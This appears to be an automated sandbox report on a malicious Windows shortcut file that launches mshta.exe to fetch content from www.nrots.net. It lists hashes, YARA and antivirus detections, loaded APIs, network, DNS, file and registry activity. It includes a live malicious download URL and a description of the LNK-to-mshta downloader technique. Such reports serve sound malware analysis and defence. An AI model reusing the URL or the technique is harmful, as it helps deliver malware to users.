2020-05-23 00:14:18,781 [lib.api.process] INFO: Terminate event set for process 5952
2020-05-23 00:14:18,796 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 5204
2020-05-23 00:14:18,796 [root] DEBUG: Terminate Event: Attempting to dump process 5952
2020-05-23 00:14:18,796 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00910000.
2020-05-23 00:14:18,796 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-05-23 00:14:18,796 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00910000.
2020-05-23 00:14:18,796 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001576.
2020-05-23 00:14:18,812 [root] INFO: b'C:\\winMkbbUJ\\CAPE\\5952_50511633218142222552020|5952|0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?'
2020-05-23 00:14:18,812 [root] INFO: cape
2020-05-23 00:14:18,812 [root] INFO: ('dump_file', 'C:\\winMkbbUJ\\CAPE\\5952_50511633218142222552020', b'0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?', ['5952'], 'procdump')
2020-05-23 00:14:18,828 [root] INFO: ('dump_file', 'C:\\winMkbbUJ\\CAPE\\5952_50511633218142222552020', '', False, 'files')
2020-05-23 00:14:18,828 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3400.
2020-05-23 00:14:18,828 [lib.api.process] INFO: Termination confirmed for process 5952
2020-05-23 00:14:18,828 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 5952
2020-05-23 00:14:18,828 [root] INFO: Terminate event set for process 5952.
2020-05-23 00:14:18,843 [root] INFO: Created shutdown mutex.
2020-05-23 00:14:18,843 [root] INFO: ('dump_file', 'C:\\Users\\Rebecca\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat', '', False, 'files')
2020-05-23 00:14:19,843 [root] INFO: Shutting down package.
2020-05-23 00:14:19,843 [root] INFO: Stopping auxiliary modules.
2020-05-23 00:14:19,921 [lib.common.results] WARNING: File C:\winMkbbUJ\bin\procmon.xml doesn't exist anymore
2020-05-23 00:14:19,921 [root] INFO: Finishing auxiliary modules.
2020-05-23 00:14:19,921 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-05-23 00:14:19,921 [root] WARNING: Folder at path "C:\winMkbbUJ\debugger" does not exist, skip.
2020-05-23 00:14:19,921 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_3 win7_3 KVM 2020-05-23 00:18:23 2020-05-23 00:24:05

File Details

File Name file
File Size 2195 bytes
File Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Jul 13 23:58:06 2009, mtime=Mon Jul 13 23:58:06 2009, atime=Tue Jul 14 01:39:21 2009, length=43520, window=hide
MD5 120e3733e167fcabdfd8194b3c49560b
SHA1 e6ab0b94782950d78d981aecbf8a3114a2b0ddd5
SHA256 f8b053e32eed9a5e814c89eec50e743a906f1aadc7a6f58e25f0410863c5ec4a
SHA512 c97a6ba4f47b62a0d7aac5d1845f5ad3cf97af9b326ac213adf6964caa7a61dae3c801b9ef7836b3a0a48748722582efb684cbcd0e3d181de856979186eb732e
CRC32 66C888C5
Ssdeep 24:8k7ppQcGSxA0OV+/T65Cw64o0c18euaoMVZ0KXQaR3+bCGO+/TDQA8PbQA8Pm:8k7/CxGH4o1cKXv3AvO9U+
Yara
  • EXE_in_LNK - Identifies executable artefacts in shortcut (LNK) files. - Author: @bartblaze
  • Download_in_LNK - Identifies download artefacts in shortcut (LNK) files. - Author: @bartblaze
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: PROPSYS.dll/
DynamicLoader: PROPSYS.dll/PropVariantToGUID
DynamicLoader: PROPSYS.dll/PSGetNameFromPropertyKey
DynamicLoader: PROPSYS.dll/PSStringFromPropertyKey
DynamicLoader: PROPSYS.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: PROPSYS.dll/PSCreatePropertyStoreFromObject
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: api-ms-win-downlevel-shlwapi-l1-1-0.dll/PathCreateFromUrlW
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSidToSidW
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: sfc.dll/SfcIsFileProtected
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTBASE.DLL/SystemFunction036
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/RegisterApplicationRestart
DynamicLoader: mshtml.dll/RunHTMLApplication
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: SHLWAPI.dll/PathRemoveArgsW
DynamicLoader: urlmon.dll/CreateURLMonikerEx
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_QueryService
DynamicLoader: SHLWAPI.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: shell32.dll/SHCreateAssociationRegistration
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: shell32.dll/SHGetKnownFolderPath
DynamicLoader: shell32.dll/SHGetKnownFolderPath
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventActivityIdControl
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHGetValueA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: urlmon.dll/CoInternetGetSession
DynamicLoader: urlmon.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHStrDupW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: DNSAPI.dll/DnsGetProxyInformation
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: USER32.dll/RegisterTouchHitTestingWindow
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: WS2_32.dll/GetAddrInfoExW
DynamicLoader: OLEACC.DLL/LresultFromObject
DynamicLoader: USER32.dll/GetGUIThreadInfo
DynamicLoader: USER32.dll/GetAccCursorInfo
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetTitleBarInfo
DynamicLoader: USER32.dll/GetScrollBarInfo
DynamicLoader: USER32.dll/GetComboBoxInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/RealChildWindowFromPoint
DynamicLoader: USER32.dll/RealGetWindowClassW
DynamicLoader: USER32.dll/GetAltTabInfoW
DynamicLoader: USER32.dll/GetListBoxInfo
DynamicLoader: USER32.dll/GetMenuBarInfo
DynamicLoader: USER32.dll/SendInput
DynamicLoader: USER32.dll/BlockInput
DynamicLoader: USER32.dll/LogicalToPhysicalPoint
DynamicLoader: USER32.dll/PhysicalToLogicalPoint
DynamicLoader: USER32.dll/WindowFromPhysicalPoint
DynamicLoader: USER32.dll/GetPhysicalCursorPos
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/VirtualFreeEx
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtAllocateVirtualMemory
DynamicLoader: ntdll.dll/NtFreeVirtualMemory
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDToProxyStubCLSID
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: OLEACC.DLL/ObjectFromLresult
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/RegisterDragDrop
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoWaitForMultipleHandles
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: d2d1.dll/
DynamicLoader: DWrite.dll/DWriteCreateFactory
DynamicLoader: dxgi.dll/CreateDXGIFactory1
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: d3d11.dll/D3D11CreateDevice
DynamicLoader: dxgi.dll/CompatValue
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTGetThunkVersion
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: D3D10Warp.dll/D3DKMTGetDisplayModeList
DynamicLoader: D3D10Warp.dll/D3DKMTSetVidPnSourceOwner
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode
DynamicLoader: D3D10Warp.dll/D3DKMTCloseAdapter
DynamicLoader: D3D10Warp.dll/D3DKMTSetGammaRamp
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForVerticalBlankEvent
DynamicLoader: GDI32.dll/D3DKMTCreateDCFromMemory
DynamicLoader: GDI32.dll/D3DKMTDestroyDCFromMemory
DynamicLoader: GDI32.dll/D3DKMTCheckVidPnExclusiveOwnership
DynamicLoader: GDI32.dll/D3DKMTCheckMonitorPowerState
DynamicLoader: GDI32.dll/D3DKMTCheckSharedResourceAccess
DynamicLoader: D3D10Warp.dll/D3DKMTSetQueuedLimit
DynamicLoader: D3D10Warp.dll/D3DKMTGetMultisampleMethodList
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayPrivateDriverFormat
DynamicLoader: D3D10Warp.dll/D3DKMTDestroySynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTCreateSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyContext
DynamicLoader: D3D10Warp.dll/D3DKMTCreateContext
DynamicLoader: D3D10Warp.dll/D3DKMTGetContextSchedulingPriority
DynamicLoader: D3D10Warp.dll/D3DKMTSetContextSchedulingPriority
DynamicLoader: D3D10Warp.dll/D3DKMTPresent
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyDevice
DynamicLoader: D3D10Warp.dll/D3DKMTCreateDevice
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAllocationResidency
DynamicLoader: D3D10Warp.dll/D3DKMTSetAllocationPriority
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyAllocation
DynamicLoader: D3D10Warp.dll/D3DKMTOpenResource
DynamicLoader: D3D10Warp.dll/D3DKMTQueryResourceInfo
DynamicLoader: D3D10Warp.dll/D3DKMTCreateAllocation
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode
DynamicLoader: D3D10Warp.dll/D3DKMTSignalSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTEscape
DynamicLoader: D3D10Warp.dll/D3DKMTUnlock
DynamicLoader: D3D10Warp.dll/D3DKMTLock
DynamicLoader: D3D10Warp.dll/D3DKMTRender
DynamicLoader: D3D10Warp.dll/OpenAdapter10_2
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: USER32.dll/IsWindowRedirectedForPrint
DynamicLoader: d2d1.dll/
DynamicLoader: DWrite.dll/DWriteCreateFactory
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
Performs HTTP requests potentially not found in PCAP.
url: www.nrots.net:80//images/5328C28B/15936/11348/7c8d64e9/e17e25e
A HTTP/S link was seen in a script or command line
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
A script process initiated network activity
request: /images/5328c28b/15936/11348/7c8d64e9/e17e25e
File has been identified by 31 Antiviruses on VirusTotal as malicious
MicroWorld-eScan: Heur.BZC.YAX.Nioc.1.0443ACBC
CAT-QuickHeal: LNK.Downloader.37267
McAfee: LNK/Agent-FSDJ!120E3733E167
Zillya: Trojan.Agent.Script.360339
Sangfor: Malware
Arcabit: Heur.BZC.YAX.Nioc.1.0443ACBC
F-Prot: LNK/Trojan.ICHT-34
Symantec: Trojan Horse
TrendMicro-HouseCall: TROJ_FRS.VSNTD720
Avast: Other:Malware-gen [Trj]
Kaspersky: HEUR:Trojan.WinLNK.Agent.gen
BitDefender: Heur.BZC.YAX.Nioc.1.0443ACBC
Tencent: Win32.Trojan.Agent.Auto
Ad-Aware: Heur.BZC.YAX.Nioc.1.0443ACBC
Sophos: Troj/DownLnk-X
DrWeb: Trojan.DownLoader33.28040
TrendMicro: TROJ_FRS.VSNTD720
McAfee-GW-Edition: LNK/Agent-FSDJ!120E3733E167
FireEye: Heur.BZC.YAX.Nioc.1.0443ACBC
Emsisoft: Heur.BZC.YAX.Nioc.1.0443ACBC (B)
Ikarus: Trojan.Agent
Cyren: LNK/Trojan.ICHT-34
Antiy-AVL: Trojan/Generic.Generic
Microsoft: Trojan:Win32/Casdet!rfn
AegisLab: Trojan.WinLNK.Acbc.4!c
ZoneAlarm: HEUR:Trojan.WinLNK.Agent.gen
GData: Heur.BZC.YAX.Nioc.1.0443ACBC
ALYac: Trojan.Downloader.LnK.Gen
Rising: Downloader.Mshta/LNK!1.BADA (CLASSIC)
AVG: Other:Malware-gen [Trj]
Qihoo-360: Generic/Trojan.066
Attempts to modify proxy settings

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
www.nrots.net [VT] 185.163.47.134 [VT]

Summary

C:\Users\Rebecca\AppData\Local\Temp\file.lnk
C:\
C:\Windows
C:\Windows\System32
C:\Windows\System32\cftmo.exe
C:\Windows\System32\mshta.exe
C:\Windows\System32\msHta.Exe:Zone.Identifier
C:\Users
C:\Users\Rebecca
C:\Users\Rebecca\AppData
C:\Users\Rebecca\AppData\Local
C:\Users\Rebecca\AppData\Local\Temp
C:\Users\Rebecca\AppData\Local\Temp\file.lnk:Zone.Identifier
C:\Windows\System32\cmd.exe
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\??\Nsi
\Device\RasAcd
C:\Windows\System32\en-US\mshtml.dll.mui
\Device\NetBT_Tcpip_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip_{D33A5283-24A7-4033-8928-D28491165639}
\Device\NetBT_Tcpip6_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip6_{D33A5283-24A7-4033-8928-D28491165639}
C:\Windows\System32\D3D10Warp.dll
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
C:\
C:\Windows
C:\Windows\System32
C:\Windows\System32\cmd.exe
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\Device\RasAcd
C:\Windows\System32\en-US\mshtml.dll.mui
\Device\NetBT_Tcpip_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip_{D33A5283-24A7-4033-8928-D28491165639}
\Device\NetBT_Tcpip6_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip6_{D33A5283-24A7-4033-8928-D28491165639}
C:\Windows\System32\mshta.exe
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\Device\RasAcd
HKEY_CLASSES_ROOT\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.Exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
